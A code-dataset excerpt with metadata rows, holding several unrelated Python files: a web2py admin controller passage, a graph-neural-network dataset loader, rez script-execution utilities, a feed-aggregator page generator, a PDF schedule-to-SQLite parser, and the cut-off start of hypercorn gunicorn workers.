tk_db(tk_table.id == fn.id).delete()
tk_db.commit()
else:
try:
hash2error[hash]['count'] += 1
except KeyError:
error_lines = error['traceback'].split("\n")
last_line = error_lines[-2]
error_causer = os.path.split(error['layer'])[1]
hash2error[hash] = dict(count=1,
pickel=error, causer=error_causer,
last_line=last_line, hash=hash,
ticket=fn.ticket_id)
except AttributeError as e:
tk_db(tk_table.id == fn.id).delete()
tk_db.commit()
decorated = [(x['count'], x) for x in hash2error.values()]
decorated.sort(key=operator.itemgetter(0), reverse=True)
return dict(errors=[x[1] for x in decorated], app=app,
method=method, db_ready=db_ready)
elif method == 'dbold':
tk_db, tk_table = get_ticket_storage(app)
for item in request.vars:
if item[:7] == 'delete_':
tk_db(tk_table.ticket_id == item[7:]).delete()
tk_db.commit()
tickets_ = tk_db(tk_table.id > 0).select(tk_table.ticket_id,
tk_table.created_datetime,
orderby=~tk_table.created_datetime)
tickets = [row.ticket_id for row in tickets_]
times = dict([(row.ticket_id, row.created_datetime) for
row in tickets_])
return dict(app=app, tickets=tickets, method=method,
times=times, db_ready=db_ready)
else:
for item in request.vars:
            # the delete_all checkbox row does not correspond to a ticket;
            # remove any other ticket whose deletion was requested
            if item[:7] == 'delete_' and (not item == "delete_all"):
os.unlink(apath('%s/errors/%s' % (app, item[7:]), r=request))
func = lambda p: os.stat(apath('%s/errors/%s' %
(app, p), r=request)).st_mtime
tickets = sorted(
            listdir(apath('%s/errors/' % app, r=request), r'^\w.*'),
key=func,
reverse=True)
return dict(app=app, tickets=tickets, method=method, db_ready=db_ready)
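# A minimal sketch of the deduplication idea used by the 'new' and 'dbnew'
# branches above: tracebacks are grouped by their md5 digest, so repeated
# occurrences of the same error are counted once (illustrative shape only,
# not the exact controller code):
#
#     digest = hashlib.md5(to_bytes(error['traceback'])).hexdigest()
#     entry = hash2error.setdefault(digest, dict(count=0, ticket=fn))
#     entry['count'] += 1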
def get_ticket_storage(app):
private_folder = apath('%s/private' % app, r=request)
ticket_file = os.path.join(private_folder, 'ticket_storage.txt')
if os.path.exists(ticket_file):
db_string = safe_open(ticket_file).read()
db_string = db_string.strip().replace('\r', '').replace('\n', '')
elif is_gae:
# use Datastore as fallback if there is no ticket_file
db_string = "google:datastore"
else:
return False
tickets_table = 'web2py_ticket'
tablename = tickets_table + '_' + app
db_path = apath('%s/databases' % app, r=request)
ticketsdb = DAL(db_string, folder=db_path, auto_import=True)
if not ticketsdb.get(tablename):
table = ticketsdb.define_table(
tablename,
Field('ticket_id', length=100),
Field('ticket_data', 'text'),
Field('created_datetime', 'datetime'),
)
return ticketsdb, ticketsdb.get(tablename)
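# A hedged sketch of what private/ticket_storage.txt may contain: a single
# DAL connection string on one line (the reader above strips newlines), e.g.
#
#     sqlite://ticket_storage.sqlite
#     mysql://username:password@localhost/ticketdb
#
# On GAE, "google:datastore" is used as a fallback when the file is missing.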
def make_link(path):
""" Create a link from a path """
tryFile = path.replace('\\', '/')
if os.path.isabs(tryFile) and os.path.isfile(tryFile):
(folder, filename) = os.path.split(tryFile)
(base, ext) = os.path.splitext(filename)
app = get_app()
editable = {'controllers': '.py', 'models': '.py', 'views': '.html'}
for key in editable.keys():
check_extension = folder.endswith("%s/%s" % (app, key))
if ext.lower() == editable[key] and check_extension:
return to_native(A('"' + tryFile + '"',
_href=URL(r=request,
f='edit/%s/%s/%s' % (app, key, filename))).xml())
return ''
def make_links(traceback):
""" Make links using the given traceback """
lwords = traceback.split('"')
# Making the short circuit compatible with <= python2.4
result = (len(lwords) != 0) and lwords[0] or ''
i = 1
while i < len(lwords):
link = make_link(lwords[i])
if link == '':
result += '"' + lwords[i]
else:
result += link
if i + 1 < len(lwords):
result += lwords[i + 1]
i = i + 1
i = i + 1
return result
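# Illustrative behaviour (hypothetical path, assuming it exists on disk and
# points at an editable controller): the traceback text is split on double
# quotes, and each quoted absolute path that make_link recognises is replaced
# by an edit link, e.g.
#
#     make_links('File "/web2py/applications/welcome/controllers/default.py", line 10')
#
# keeps the surrounding text and wraps the quoted path in an <a> element.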
class TRACEBACK(object):
""" Generate the traceback """
def __init__(self, text):
""" TRACEBACK constructor """
self.s = make_links(CODE(text).xml())
def xml(self):
""" Returns the xml """
return self.s
def ticket():
""" Ticket handler """
if len(request.args) != 2:
session.flash = T('invalid ticket')
redirect(URL('site'))
app = get_app()
myversion = request.env.web2py_version
ticket = request.args[1]
e = RestrictedError()
e.load(request, app, ticket)
return dict(app=app,
ticket=ticket,
output=e.output,
traceback=(e.traceback and TRACEBACK(e.traceback)),
snapshot=e.snapshot,
code=e.code,
layer=e.layer,
myversion=myversion)
def ticketdb():
""" Ticket handler """
if len(request.args) != 2:
session.flash = T('invalid ticket')
redirect(URL('site'))
app = get_app()
myversion = request.env.web2py_version
ticket = request.args[1]
e = RestrictedError()
request.tickets_db = get_ticket_storage(app)[0]
e.load(request, app, ticket)
response.view = 'default/ticket.html'
return dict(app=app,
ticket=ticket,
output=e.output,
traceback=(e.traceback and TRACEBACK(e.traceback)),
snapshot=e.snapshot,
code=e.code,
layer=e.layer,
myversion=myversion)
def error():
""" Generate a ticket (for testing) """
raise RuntimeError('admin ticket generator at your service')
def update_languages():
""" Update available languages """
app = get_app()
update_all_languages(apath(app, r=request))
session.flash = T('Language files (static strings) updated')
redirect(URL('design', args=app, anchor='languages'))
def user():
if MULTI_USER_MODE:
if not db(db.auth_user).count():
auth.settings.registration_requires_approval = False
return dict(form=auth())
else:
return dict(form=T("Disabled"))
def reload_routes():
""" Reload routes.py """
gluon.rewrite.load()
redirect(URL('site'))
def manage_students():
if not (MULTI_USER_MODE and is_manager()):
session.flash = T('Not Authorized')
redirect(URL('site'))
db.auth_user.registration_key.writable = True
grid = SQLFORM.grid(db.auth_user)
return locals()
def bulk_register():
if not (MULTI_USER_MODE and is_manager()):
session.flash = T('Not Authorized')
redirect(URL('site'))
form = SQLFORM.factory(Field('emails', 'text'))
if form.process().accepted:
emails = [x.strip() for x in form.vars.emails.split('\n') if x.strip()]
n = 0
for email in emails:
if not db.auth_user(email=email):
n += db.auth_user.insert(email=email) and 1 or 0
session.flash = T('%s students registered', n)
redirect(URL('site'))
return locals()
# Begin experimental stuff; needs fixes:
# 1) should run in its own process - cannot os.chdir
# 2) should not prompt user at console
# 3) should give option to force commit and not require manual merge
def git_pull():
""" Git Pull handler """
app = get_app()
if not have_git:
session.flash = GIT_MISSING
redirect(URL('site'))
dialog = FORM.confirm(T('Pull'),
{T('Cancel'): URL('site')})
if dialog.accepted:
try:
repo = git.Repo(os.path.join(apath(r=request), app))
origin = repo.remotes.origin
origin.fetch()
origin.pull()
session.flash = T("Application updated via git pull")
redirect(URL('site'))
except git.CheckoutError:
session.flash = T("Pull failed, certain files could not be checked out. Check logs for details.")
redirect(URL('site'))
except git.UnmergedEntriesError:
session.flash = T("Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.")
redirect(URL('site'))
except git.GitCommandError:
session.flash = T(
"Pull failed, git exited abnormally. See logs for details.")
redirect(URL('site'))
except AssertionError:
session.flash = T("Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.")
redirect(URL('site'))
elif 'cancel' in request.vars:
redirect(URL('site'))
return dict(app=app, dialog=dialog)
def git_push():
""" Git Push handler """
app = get_app()
if not have_git:
session.flash = GIT_MISSING
redirect(URL('site'))
form = SQLFORM.factory(Field('changelog', requires=IS_NOT_EMPTY()))
form.element('input[type=submit]')['_value'] = T('Push')
form.add_button(T('Cancel'), URL('site'))
form.process()
if form.accepted:
try:
repo = git.Repo(os.path.join(apath(r=request), app))
index = repo.index
index.add([apath(r=request) + app + '/*'])
new_commit = index.commit(form.vars.changelog)
origin = repo.remotes.origin
origin.push()
session.flash = T(
"Git repo updated with latest application changes.")
redirect(URL('site'))
except git.UnmergedEntriesError:
session.flash = T("Push failed, there are unmerged entries in the cache. Resolve merge issues manually and try again.")
redirect(URL('site'))
return dict(app=app, form=form)
def plugins():
app = request.args(0)
from gluon.serializers import loads_json
if not session.plugins:
try:
rawlist = urlopen("http://www.web2pyslices.com/" +
"public/api.json/action/list/content/Package?package" +
"_type=plugin&search_index=false").read()
session.plugins = loads_json(rawlist)
        except Exception:
response.flash = T('Unable to download the list of plugins')
session.plugins = []
return dict(plugins=session.plugins["results"], app=request.args(0))
def install_plugin():
app = request.args(0)
source = request.vars.source
plugin = request.vars.plugin
if not (source and app):
raise HTTP(500, T("Invalid request"))
# make sure no XSS attacks in source
if not source.lower().split('://')[0] in ('http','https'):
raise HTTP(500, T("Invalid request"))
form = SQLFORM.factory()
result = None
if form.process().accepted:
# get w2p plugin
if "web2py.plugin." in source:
filename = "web2py.plugin.%s.w2p" % \
source.split("web2py.plugin.")[-1].split(".w2p")[0]
else:
filename = "web2py.plugin.%s.w2p" % cleanpath(plugin)
if plugin_install(app, urlopen(source),
request, filename):
session.flash = T('New plugin installed: %s', filename)
else:
session.flash = \
T('unable to install plugin "%s"', filename)
redirect(URL(f="plugins", args=[app, ]))
return dict(form=form, app=app, plugin=plugin, source=source)
| 37.259075
| 195
| 0.5483
|
4a1431efd3ae0c0e312c0f37bb9602947b5ee419
| 7,289
|
py
|
Python
|
utils/data/wy_dataset4.py
|
WuYff/ggnn.pytorch
|
795bc7fb51876231406d71610aa5ec7ed29865c0
|
[
"MIT"
] | null | null | null |
utils/data/wy_dataset4.py
|
WuYff/ggnn.pytorch
|
795bc7fb51876231406d71610aa5ec7ed29865c0
|
[
"MIT"
] | null | null | null |
utils/data/wy_dataset4.py
|
WuYff/ggnn.pytorch
|
795bc7fb51876231406d71610aa5ec7ed29865c0
|
[
"MIT"
] | null | null | null |
import os
from typing import Tuple
import numpy as np
# Can we assign -1? It may be better than 0.
# Data-structure indices start from zero, but node id values start from one.
# Output a whole matrix.
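# A hedged sketch of the on-disk format assumed by the parser below (inferred
# from the parsing code; the producing tool is not shown here):
#   <stem>_graph.txt          one line per node: "node_id neighbor1 neighbor2 ..."
#   <stem>_target.txt         one line per node: "node_id rd1 rd2 ..."
#   <stem>_node_variable.txt  one line per node: "node_id variable"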
def load_graphs_from_file(path: str, how_many: int) -> Tuple[list, int]:
data_list = []
max_node_id = 0
path_list=os.listdir(path)
key="graph"
skip_init = True
count_ini =0
for filename in path_list:
if key in filename:
file = path + filename[:-10]
# print("file: "+filename[:-10])
if os.path.exists(file + "_graph.txt"):
edge_list = []
label_list = []
target_list = []
max_node_of_one_graph = 0
# [source node, target node]
with open(file + "_graph.txt", 'r') as f:
                    lines = f.readlines()  # read all lines
                    last_line = lines[-1]  # take the last line
n = last_line.split(" ")
node = int(n[0])
if skip_init and ((len(lines) == 3 and node == 3) or node > how_many ):
count_ini +=1
continue
for line in lines:
line_tokens = line.split(" ")
for i in range(1, len(line_tokens)):
digits = [int(line_tokens[0]), 1, 0]
if line_tokens[i] == "\n":
continue
node_id = int(line_tokens[i])
digits[2] = node_id
if node_id > max_node_id:
max_node_id = node_id
if node_id > max_node_of_one_graph:
max_node_of_one_graph = node_id
edge_list.append(digits)
# [node, rd1, rd2,....]
with open(file + "_target.txt", 'r') as f:
for line in f:
digits = []
line_tokens = line.split(" ")
for i in range(0, len(line_tokens)):
if line_tokens[i] == "\n":
continue
digits.append(int(line_tokens[i]))
target_list.append(digits) # [[,,,][,,][,,]]
# [node,variable]
with open(file + "_node_variable.txt", 'r') as f:
for line in f:
digits = [0, 0]
line_tokens = line.split(" ")
digits[0] = int(line_tokens[0])
digits[1] = int(line_tokens[1])
label_list.append(digits)
data_list.append([edge_list, label_list, target_list,max_node_of_one_graph])
print("totoal data : ", len(data_list))
return (data_list, max_node_id)
def split_set(data_list:list):
n_examples = len(data_list)
idx = range(n_examples)
num = round(n_examples*0.6)
t= round(n_examples*0.2)
train = idx[:num]
test = idx[num: num+t]
val = idx[num+t:]
return np.array(data_list)[train], np.array(data_list)[val], np.array(data_list)[test]
def data_convert(data_list: list, n_annotation_dim: int, n_nodes: int):
n_tasks = 1
task_data_list = []
for i in range(n_tasks):
task_data_list.append([])
for item in data_list:
edge_list = item[0]
label_list = item[1]
target_list = item[2]
max_node_of_one_graph = item[3]
task_type = 1
        task_output = create_task_output(target_list, n_nodes)  # previously a single int; now a list of length n_nodes * n_nodes
annotation = np.zeros([n_nodes, n_annotation_dim])
        # annotation[target[1] - 1][0] = 1  # define annotation and n_annotation_dim for your own task
annotation = create_annotation_output(label_list, annotation)
task_data_list[task_type - 1].append([edge_list, annotation, task_output, max_node_of_one_graph])
return task_data_list
# Note that rd_id >= 1, because zero means the corresponding node does not reach the current node.
# Returns target [r0_1, r0_2, ..., rn_1, ..., rn_n] with length V*V.
def create_task_output(target_list: list, n_nodes: int) -> np.array:
a = np.zeros((n_nodes, n_nodes))
# print("n_nodes",n_nodes)
# print("target_list",target_list)
for each_node_rd in target_list:
# print("each_node_rd",each_node_rd)
for rd_id in each_node_rd[1:]:
a[each_node_rd[0] - 1][rd_id - 1] = 1
b = np.zeros(n_nodes*n_nodes)
for i in range(n_nodes):
for j in range(n_nodes):
b[i*n_nodes+j] = a[i][j]
return b
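# Illustrative example (1-based node ids as above): with n_nodes=3 and
# target_list=[[1, 2], [2, 3]], node 1 reaches node 2 and node 2 reaches
# node 3, so the flattened output has b[0*3+1] == 1 and b[1*3+2] == 1,
# and zeros elsewhere.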
# return annotation matrix [V, 1] (current annotation dim =1)
def create_annotation_output(label_list: list, annotation):
for each_node_varible in label_list:
annotation[each_node_varible[0] - 1][0] = each_node_varible[1]
return annotation
# return adjacency matrix [V, V * n_edge_types * 2]
def create_adjacency_matrix(edges, n_nodes, n_edge_types):  # records both the incoming and outgoing edges of each node
a = np.zeros([n_nodes, n_nodes * n_edge_types * 2])
for edge in edges:
src_idx = edge[0]
e_type = edge[1]
tgt_idx = edge[2]
a[tgt_idx - 1][(e_type - 1) * n_nodes + src_idx - 1] = 1
a[src_idx - 1][(e_type - 1 + n_edge_types) * n_nodes + tgt_idx - 1] = 1
return a
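# Layout sketch: for each edge type, one column block of width n_nodes holds
# incoming edges and a second block holds outgoing edges, so with one edge
# type the matrix is [V, 2*V]. E.g. edge [1, 1, 2] sets a[1][0] = 1 (node 2
# receives from node 1) and a[0][n_nodes + 1] = 1 (node 1 sends to node 2).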
class bAbIDataset():
"""
Load bAbI tasks for GGNN
"""
def __init__(self, path, task_id, is_train,node_number,how_many:int):
self.n_edge_types = 1
self.n_tasks = 1
all_data, self.n_node = load_graphs_from_file(path,how_many)
# all_task_train_data, all_task_val_data, all_task_test_data = split_set(all_data)
# if is_train == "t":
# print("prepare train data")
# all_task_train_data = data_convert(all_task_train_data, 1, self.n_node)
# self.data = all_task_train_data[task_id]
# elif is_train == "v":
# print("prepare validation data")
# self.n_node = node_number
# all_task_val_data = data_convert(all_task_val_data, 1, self.n_node)
# self.data = all_task_val_data[task_id]
# else:
# print("prepare test data")
# self.n_node = node_number
# all_task_test_data = data_convert(all_task_test_data, 1, self.n_node)
# self.data = all_task_test_data[task_id]
print("prepare data")
        all_task_data = data_convert(all_data, 1, self.n_node)
        self.data = all_task_data[task_id]  # __getitem__/__len__ below rely on self.data
def __getitem__(self, index):
am = create_adjacency_matrix(self.data[index][0], self.n_node, self.n_edge_types)
annotation = self.data[index][1]
target = self.data[index][2]
        max_node_of_one_graph = self.data[index][3]  # this version: list; the upstream code used an int
return am, annotation, target, max_node_of_one_graph
def __len__(self):
return len(self.data)
if __name__ == "__main__":
    train_dataset = bAbIDataset("", 0, "t", node_number=0, how_many=10)  # placeholder arguments for a quick smoke test
am, annotation, target, max_node_of_one_graph= train_dataset.__getitem__(0)
print("am", am) # [v,v]
print("annotation", annotation) # [v,1]
print("target", target) #[v*v]
## TODO: write documentation!
| 40.049451
| 105
| 0.557278
|
4a14325d85a1e08181620a16eb0d3d4492ce20b7
| 8,869
|
py
|
Python
|
src/rez/utils/execution.py
|
alexey-pelykh/rez
|
ad12105d89d658e4d2ea9249e537b3de90391f0e
|
[
"Apache-2.0"
] | null | null | null |
src/rez/utils/execution.py
|
alexey-pelykh/rez
|
ad12105d89d658e4d2ea9249e537b3de90391f0e
|
[
"Apache-2.0"
] | null | null | null |
src/rez/utils/execution.py
|
alexey-pelykh/rez
|
ad12105d89d658e4d2ea9249e537b3de90391f0e
|
[
"Apache-2.0"
] | null | null | null |
# SPDX-License-Identifier: Apache-2.0
# Copyright Contributors to the Rez Project
"""
Utilities related to process/script execution.
"""
from rez.vendor.six import six
from rez.utils.yaml import dump_yaml
from rez.vendor.enum import Enum
from contextlib import contextmanager
import subprocess
import sys
import stat
import os
import io
@contextmanager
def add_sys_paths(paths):
"""Add to sys.path, and revert on scope exit.
"""
original_syspath = sys.path[:]
sys.path.extend(paths)
try:
yield
finally:
sys.path = original_syspath
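# Usage sketch (hypothetical directory and module name): entries added to
# sys.path are visible only inside the with-block and removed afterwards.
#
#     with add_sys_paths(["/tmp/extra_modules"]):
#         import my_plugin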
if six.PY2:
class _PopenBase(subprocess.Popen):
def __enter__(self):
return self
def __exit__(self, exc_type, value, traceback):
self.wait()
else: # py3
_PopenBase = subprocess.Popen
class Popen(_PopenBase):
"""subprocess.Popen wrapper.
Allows for Popen to be used as a context in both py2 and py3.
"""
def __init__(self, args, **kwargs):
# Avoids python bug described here: https://bugs.python.org/issue3905.
# This can arise when apps (maya) install a non-standard stdin handler.
#
# In newer version of maya and katana, the sys.stdin object can also
# become replaced by an object with no 'fileno' attribute, this is also
# taken into account.
#
if "stdin" not in kwargs:
try:
file_no = sys.stdin.fileno()
# https://github.com/nerdvegas/rez/pull/966
except (AttributeError, io.UnsupportedOperation):
file_no = None
if file_no is None and sys.__stdin__ is not None:
file_no = sys.__stdin__.fileno()
if file_no not in (0, 1, 2):
kwargs["stdin"] = subprocess.PIPE
# Add support for the new py3 "text" arg, which is equivalent to
# "universal_newlines".
# https://docs.python.org/3/library/subprocess.html#frequently-used-arguments
#
text = kwargs.pop("text", None)
universal_newlines = kwargs.pop("universal_newlines", None)
if text or universal_newlines:
kwargs["universal_newlines"] = True
# fixes py3/cmd.exe UnicodeDecodeError() with some characters.
# UnicodeDecodeError: 'charmap' codec can't decode byte
# 0x8d in position 1023172: character maps to <undefined>
#
        # NOTE: currently no solution for Python 3 versions earlier than 3.6
#
if sys.version_info[:2] >= (3, 6) and "encoding" not in kwargs:
kwargs["encoding"] = "utf-8"
super(Popen, self).__init__(args, **kwargs)
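# Usage sketch (illustrative command line): a drop-in subprocess.Popen
# replacement that works as a context manager on both py2 and py3.
#
#     with Popen(["echo", "hello"], stdout=subprocess.PIPE, text=True) as proc:
#         out, _ = proc.communicate()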
class ExecutableScriptMode(Enum):
"""
Which scripts to create with util.create_executable_script.
"""
# Start with 1 to not collide with None checks
# Requested script only. Usually extension-less.
single = 1
# Create .py script that will allow launching scripts on
# windows without extension, but may require extension on
# other systems.
py = 2
# Will create py script on windows and requested on
# other platforms
platform_specific = 3
# Creates the requested script and an .py script so that scripts
# can be launched without extension from windows and other
# systems.
both = 4
# TODO: Maybe also allow distlib.ScriptMaker instead of the .py + PATHEXT.
def create_executable_script(filepath, body, program=None, py_script_mode=None):
"""
    Create an executable script. If py_script_mode has been set to create
    a .py script, the shell is expected to have the PATHEXT environment
    variable include ".PY" in order to launch the command without typing
    the .py extension.
Args:
filepath (str): File to create.
body (str or callable): Contents of the script. If a callable, its code
is used as the script body.
program (str): Name of program to launch the script. Default is 'python'
py_script_mode(ExecutableScriptMode): What kind of script to create.
Defaults to rezconfig.create_executable_script_mode.
Returns:
List of filepaths of created scripts. This may differ from the supplied
filepath depending on the py_script_mode
"""
from rez.config import config
from rez.utils.platform_ import platform_
program = program or "python"
py_script_mode = py_script_mode or config.create_executable_script_mode
# https://github.com/nerdvegas/rez/pull/968
is_forwarding_script_on_windows = (
program == "_rez_fwd"
and platform_.name == "windows"
and filepath.lower().endswith(".cmd")
)
if callable(body):
from rez.utils.sourcecode import SourceCode
code = SourceCode(func=body)
body = code.source
if not body.endswith('\n'):
body += '\n'
    # Windows does not honor the shebang line, but runs the script with the
    # default python, or, on later Python versions, with the 'py' launcher,
    # which picks a sensible interpreter based on the shebang line
    # (compare PEP 397).
    # In order for execution to work on Windows we need to create a .py
    # file and set PATHEXT to include .py (as done by the shell plugins).
    # So, depending on the py_script_mode, we might need to create more than
    # one script.
script_filepaths = [filepath]
if program == "python":
script_filepaths = _get_python_script_files(filepath, py_script_mode,
platform_.name)
for current_filepath in script_filepaths:
with open(current_filepath, 'w') as f:
# TODO: make cross platform
if is_forwarding_script_on_windows:
# following lines of batch script will be stripped
# before yaml.load
f.write("@echo off\n")
f.write("%s.exe %%~dpnx0 %%*\n" % program)
f.write("goto :eof\n") # skip YAML body
f.write(":: YAML\n") # comment for human
else:
f.write("#!/usr/bin/env %s\n" % program)
f.write(body)
# TODO: Although Windows supports os.chmod you can only set the readonly
# flag. Setting the file readonly breaks the unit tests that expect to
# clean up the files once the test has run. Temporarily we don't bother
# setting the permissions, but this will need to change.
if os.name == "posix":
os.chmod(
current_filepath,
stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IXUSR
| stat.S_IXGRP | stat.S_IXOTH
)
return script_filepaths
def _get_python_script_files(filepath, py_script_mode, platform):
"""
Evaluates the py_script_mode for the requested filepath on the given
platform.
Args:
filepath: requested filepath
py_script_mode (ExecutableScriptMode):
platform (str): Platform to evaluate the script files for
Returns:
list of str: filepaths of scripts to create based on inputs
"""
script_filepaths = []
base_filepath, extension = os.path.splitext(filepath)
has_py_ext = extension == ".py"
is_windows = platform == "windows"
if (
py_script_mode == ExecutableScriptMode.single
or py_script_mode == ExecutableScriptMode.both
or (py_script_mode == ExecutableScriptMode.py and has_py_ext)
or (py_script_mode == ExecutableScriptMode.platform_specific and not is_windows)
or (py_script_mode == ExecutableScriptMode.platform_specific and is_windows and has_py_ext)
):
script_filepaths.append(filepath)
if (
not has_py_ext
and (
py_script_mode == ExecutableScriptMode.both
or py_script_mode == ExecutableScriptMode.py
or (py_script_mode == ExecutableScriptMode.platform_specific and is_windows)
)
):
script_filepaths.append(base_filepath + ".py")
return script_filepaths
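# Illustrative expectations, derived from the branches above (not from a
# test suite):
#     _get_python_script_files("rez", ExecutableScriptMode.both, "windows")
#         -> ["rez", "rez.py"]
#     _get_python_script_files("rez", ExecutableScriptMode.platform_specific, "windows")
#         -> ["rez.py"]
#     _get_python_script_files("rez", ExecutableScriptMode.platform_specific, "linux")
#         -> ["rez"]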
def create_forwarding_script(filepath, module, func_name, *nargs, **kwargs):
"""Create a 'forwarding' script.
A forwarding script is one that executes some arbitrary Rez function. This
is used internally by Rez to dynamically create a script that uses Rez,
even though the parent environment may not be configured to do so.
"""
from rez.utils.platform_ import platform_
if platform_.name == "windows" and \
os.path.splitext(filepath)[-1].lower() != ".cmd":
filepath += ".cmd"
doc = dict(
module=module,
func_name=func_name)
if nargs:
doc["nargs"] = nargs
if kwargs:
doc["kwargs"] = kwargs
body = dump_yaml(doc)
create_executable_script(filepath, body, "_rez_fwd")
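# Sketch of the generated file (shape only; exact formatting depends on
# dump_yaml, and the module/function names are hypothetical):
#     create_forwarding_script("/tmp/fwd", "rez.cli", "run")
# produces a script whose body is a small YAML document such as
#     func_name: run
#     module: rez.cli
# which is later executed by the "_rez_fwd" program installed above.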
| 33.342105
| 99
| 0.642801
|
4a14327767ffb4a5a62e369f04814176c84959d4
| 1,612
|
py
|
Python
|
generate.py
|
hrw/very-simple-planet-aggregator
|
d3c9f8497a60d102d8789c442541d3322da09b87
|
[
"MIT"
] | 3
|
2020-01-21T20:10:19.000Z
|
2020-05-26T08:53:16.000Z
|
generate.py
|
hrw/very-simple-planet-aggregator
|
d3c9f8497a60d102d8789c442541d3322da09b87
|
[
"MIT"
] | 1
|
2020-01-22T09:04:43.000Z
|
2020-01-22T11:05:28.000Z
|
generate.py
|
hrw/very-simple-planet-aggregator
|
d3c9f8497a60d102d8789c442541d3322da09b87
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# SPDX-License-Identifier: MIT
from datetime import datetime
from jinja2 import Environment, FileSystemLoader
import sqlite3
import time
MAX_ENTRIES_PER_FEED = 8
def filter_date(value, format='%d %B %Y'):
return time.strftime(format, time.strptime(value, '%Y-%m-%d %H:%M:%S'))
conn = sqlite3.connect('feeds.db')
conn.row_factory = sqlite3.Row
c = conn.cursor()
c.execute('''SELECT name, url, etag, modified, id, blog_url
FROM feeds
ORDER BY name''')
feeds = c.fetchall()
c.execute('''SELECT f.name, f.blog_url, f.title as blog_title,
p.feed_id, p.title, p.url, p.post, p.published_date,
p.author
FROM posts p, feeds f
WHERE f.id = p.feed_id
ORDER by p.published_date DESC
LIMIT 20''')
posts = c.fetchall()
conn.close()
file_loader = FileSystemLoader('templates')
env = Environment(loader=file_loader)
env.filters['date'] = filter_date
template = env.get_template('index.html.j2')
output = template.render(generate_time=datetime.strftime(datetime.utcnow(),
"%d %B %Y %H:%M"),
posts=posts, feeds=feeds)
with open('index.html', 'w') as html:
html.write(output)
template = env.get_template('rss20.xml.j2')
output = template.render(generate_time=datetime.strftime(datetime.utcnow(),
"%d %B %Y %H:%M"),
posts=posts, feeds=feeds)
with open('rss20.xml', 'w') as rss:
rss.write(output)
| 25.587302
| 75
| 0.590571
|
4a1433e7af3a8ee2eeb57b2aa913e6fda0beb0c8
| 3,247
|
py
|
Python
|
advance_schedule.py
|
ethoel/pdf-to-db
|
db1a8a0d0d52405b394cf47df9fb38727afb34e6
|
[
"MIT"
] | null | null | null |
advance_schedule.py
|
ethoel/pdf-to-db
|
db1a8a0d0d52405b394cf47df9fb38727afb34e6
|
[
"MIT"
] | null | null | null |
advance_schedule.py
|
ethoel/pdf-to-db
|
db1a8a0d0d52405b394cf47df9fb38727afb34e6
|
[
"MIT"
] | null | null | null |
import re
import sqlite3
from datetime import date, timedelta
# download pdf with wget
# decrypt pdf with qpdf
# qpdf --password=5290 --decrypt test.pdf camtest.pdf
# convert pdf to text, can consider decreasing 5 if issues
# pdftotext -opw 5290 -fixed 5 test.pdf
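# A hedged sketch of driving the two shell steps above from Python (file
# names and the password follow the comments; qpdf and pdftotext must be
# on PATH):
#
#     import subprocess
#     subprocess.run(["qpdf", "--password=5290", "--decrypt",
#                     "test.pdf", "camtest.pdf"], check=True)
#     subprocess.run(["pdftotext", "-opw", "5290", "-fixed", "5",
#                     "test.pdf"], check=True)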
# open pdftotext file
lines = []
with open('advance_schedule.txt') as f:
lines = f.readlines()
# create or connect to database and create assignments table if not exist
connection = sqlite3.connect('schedule.db')
cursor = connection.cursor();
cursor.execute('''
CREATE TABLE IF NOT EXISTS assignments (
assignment_id INTEGER PRIMARY KEY,
date TEXT NOT NULL,
anesthesiologist TEXT NOT NULL,
assignment TEXT NOT NULL,
UNIQUE(date, anesthesiologist));''')
# get the first date in advance schedule, table 0, row 2, value 0
#raw_date = tables[0][2][0]
#raw_date = raw_date.split('/')
# create a date from raw_date passing year, month, day
#first_date = date(int(raw_date[2]), int(raw_date[0]), int(raw_date[1]))
# get the first assignment date
raw_date = lines[2].split(maxsplit=1)[0].strip()
split_date = raw_date.split('/')
first_date = date(int(split_date[2]), int(split_date[0]), int(split_date[1]))
tables = []
rows = []
keep_row = False
for line in lines:
if not line.strip(): continue
header = line.split(maxsplit=1)[0].strip()
if header == '*': continue
if header == raw_date: keep_row = True
if header == 'W':
tables.append(rows)
rows = []
keep_row = False
if keep_row: rows.append(line.strip('\n'))
# parse the text version of the assignments
for table in tables:
# find the end index after match
    # end_indices = [match.end() for match in re.finditer(r"\S+", table[0])]
    end_indices = []
    matches = re.finditer(r"\S+", table[0])
# skip first match and add the start of second instead
next(matches)
second_match = next(matches)
end_indices.append(second_match.start() - 1)
end_indices.append(second_match.end())
for match in matches:
end_indices.append(match.end())
# no need for divider at very end
end_indices = end_indices[:-1]
# add dividers to the table
for k, row in enumerate(table):
for i in end_indices:
row = row[:i] + '|' + row[i+1:]
# split along those dividers
print(row)
table[k] = [value.strip() for value in row.split('|')]
for table in tables:
for row in table[1:]:
anes = row[0].split('/')[::-1][0].strip()
print(len(row), end=' ')
print(anes, end=' ')
print(row[1:])
# set the date to the first date of the table
cur_date = first_date
# add the assignments for each anesthesiologist
for assignment in row[1:]:
assignment = assignment.strip()
            # parameterized SQL: values containing quotes cannot break the statement
            cursor.execute('''
            REPLACE INTO assignments (date, anesthesiologist, assignment)
            VALUES (?, ?, ?);''', (str(cur_date), anes, assignment))
cur_date = cur_date + timedelta(days=1)
# initialize the first date for the next table
first_date = cur_date
connection.commit()
connection.close()
| 32.47
| 77
| 0.638743
|
4a14347f545b78f6d2a5ed830b21f4aa0356a37a
| 5,404
|
py
|
Python
|
src/hypercorn/workers.py
|
nonebot/nonecorn
|
813408d385f11b6bbdaee63d6b6ace8c87586d25
|
[
"MIT"
] | 2
|
2021-11-29T05:56:51.000Z
|
2022-02-07T06:27:24.000Z
|
src/hypercorn/workers.py
|
nonebot/nonecorn
|
813408d385f11b6bbdaee63d6b6ace8c87586d25
|
[
"MIT"
] | 3
|
2021-11-08T11:58:51.000Z
|
2021-12-09T11:29:54.000Z
|
src/hypercorn/workers.py
|
nonebot/nonecorn
|
813408d385f11b6bbdaee63d6b6ace8c87586d25
|
[
"MIT"
] | null | null | null |
from typing import List, Callable, Awaitable, Any
import asyncio
import signal
from functools import partial
from gunicorn.workers.base import Worker
from gunicorn.sock import TCPSocket
from hypercorn.config import Config as _Config, Sockets
from hypercorn.asyncio import serve as asyncio_serve
class Config(_Config):
sockets: Sockets = None
def create_sockets(self) -> Sockets:
return self.sockets
def transfer_sock(gunicorn_sock: List[TCPSocket]) -> Sockets:
secure_sockets = []
insecure_sockets = []
for sock in gunicorn_sock:
if sock.conf.is_ssl:
secure_sockets.append(sock.sock)
else:
